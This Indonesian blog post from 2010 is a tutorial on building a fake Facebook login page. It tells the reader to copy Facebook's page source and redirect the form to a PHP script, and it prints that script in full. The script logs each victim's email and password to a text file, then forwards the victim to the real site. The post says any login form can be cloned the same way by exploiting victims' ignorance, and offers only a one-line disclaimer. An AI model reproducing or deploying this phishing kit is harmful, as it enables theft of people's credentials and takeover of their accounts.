Mohon maaf, mungkin terdapat beberpa tulisan yang contohnya tidak ada dan tidak dapat didownload bahkan sudah tidak dapat diterapkan. Hal ini dikarenakan tulisan tersebut dibuat babaerapa tahun lalu (jadul).

01 December 2010

Membuat Fake Login atau Login Palsu Facebook

Administrator 01 December 2010 64
Membuat Fake Login atau Login Palsu Facebook
Setelah beberapa lalu ktia membahas mengenai teori social engineering untuk mendapatkan ID facebook orang lain, sekarang Kita coba belajar membuat fake login tersebut. Pertama tama kita ambil dulu sourcer code asli dari halaman aslinya. Dalam hal ini kita ambil contoh facebook. Untuk mengetahui source code facebook ini sangat mudah. Pertama kunjungi halaman facebook kemudian klik kanan mouse kemudian pilih view page source jika Anda menggunakan browser google chrome. Setelah terbuka, silahkan copy source code tersebut. Setelah itu, buat dahulu file dengan extensi php pada hosting kemudian paste-kan kode tersebut pada file yang baru dibut tersebut. Dalam hal ini saya buat dengan nama login.html. Sekarang Anda coba akses file tersbut. Apabila tampilan sesuai dengan facebook, berarti berhasil. Anda dapat melihat gambarnya di bawah ini. :

Halaman login facebook

Source code facebook

Tampilan sukses

Setelah Anda menyimpan file source code tersebut, sekarang cari potongan kode (menggunakan fungsi find atau ctrf+f) id="login_form". Setelah ketemu, ubah action-nya menjadi login.php. Hal ini berfungsi untuk, apabila korban login pada halaman palsu facebook yang telah buat, korban akan dialihkan ke file login.php. Isi dari file login.php adalah sebagai berikut :
<?php
 //menentukan nama file
 $file = "hasil.txt";
 //apabila file ada, akan melakukan proses slenjutnya
 //apabila tidak ada, file hasil.txt dibuat
 //kemudian ke proses selanjutnya
 $a= fopen($file, 'a+') or die("can't open file");
 //mengakap variabel yang dikirim dari file login.html
 $text = "$_POST[email] -> $_POST[pass]\r\n";
 //setelah didapatkan, variabel tersebut ditulis
 $write=fwrite($a, $text);
 //file ditutup kembali
 fclose($a);

 //halaman dialihkan otomatis ke halaman asli facebook
 echo"<script language=javascript>window.location='http://www.facebook.com'</script>";
?>

Setelah selesai, upload file login.html dan login.php yang telah kita buat ke server host. Kemudian buka alamat URL login.html yang telah Anda buat dan cobalah melakukan login. Jika sudah, sekarang silahkan buka alamat URL hasil.txt. Apabila sudah tertulis, berarti pekerjaan Kita telah berhasil. Anda dapat mengubah tampilan hasil.txt sesuai selera. Tidak hanya facebook yang bisa dilakukan, semua form login apapun dapat dibuat halaman palsunya namun caranya tetap sama dengan memanfaatkan ketidak tahuan korban (social engineering).

Dilarang keras membuat dengan tujuan yang tidak baik!!!

FYI : Penarapan hal ini bisa berdampak di-suspend-nya / diblokirnya hosting Anda!!!